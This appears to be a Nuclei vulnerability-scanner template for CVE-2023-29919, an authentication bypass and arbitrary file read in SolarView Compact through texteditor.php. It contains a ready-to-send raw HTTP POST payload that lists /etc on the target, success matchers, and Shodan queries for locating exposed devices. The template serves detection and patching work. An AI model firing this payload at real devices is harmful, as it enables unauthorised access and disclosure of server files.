Description
There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php
There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php
id: CVE-2023-29919
info:
name: SolarView Compact <= 6.00 - Local File Inclusion
author: For3stCo1d
severity: critical
description: |
There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
remediation: |
Upgrade to a patched version of SolarView Compact or apply the vendor-provided security patch to mitigate the LFI vulnerability.
reference:
- https://github.com/xiaosed/CVE-2023-29919
- https://nvd.nist.gov/vuln/detail/CVE-2023-29919
- https://www.solarview.io/
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2023-29919
cwe-id: CWE-276
epss-score: 0.60221
epss-percentile: 0.99095
cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: contec
product: solarview_compact
shodan-query:
- http.html:"SolarView Compact"
- cpe:"cpe:2.3:h:contec:solarview_compact"
tags: cve,cve2023,lfi,solarview,edb,contec,vkev,vuln
http:
- raw:
- |
POST /texteditor.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
directory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'action="texteditor.php"'
- 'adduser.conf'
- 'deluser.conf'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100859aa5719ac93918e22f85a0cbaa0cf3975cf1a77302c1c646ab25dc1be739960220329048a6211fc76dcd29c96a60739185abb0675f23c95550ebc69fac24723f80:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.